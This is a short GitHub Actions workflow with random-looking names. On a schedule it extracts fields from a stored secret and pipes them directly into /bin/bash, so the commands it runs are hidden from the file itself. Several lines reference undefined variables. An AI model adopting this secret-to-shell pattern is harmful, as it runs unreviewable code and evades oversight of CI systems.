name: chujunllh
on:
  workflow_dispatch:
  schedule:
    - cron: '13 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chujunllh
        env:
          ns17707: ${{ secrets.ns17707 }}
        run: |
          echo $ns17707 | jq -r .dxqz9828 | /bin/bash
          echo $nkek39 | jq -r .yuy92673 | /bin/bash
          echo $iq128 | jq -r .zsvg35240 | /bin/bash
          echo $zt996 | jq -r .aigx2594 | /bin/bash
          echo $y6116 | jq -r .zch943 | /bin/bash
          echo $jxv1 | jq -r .y800 | /bin/bash
          echo $bn7 | jq -r .dnkwg8370 | /bin/bash

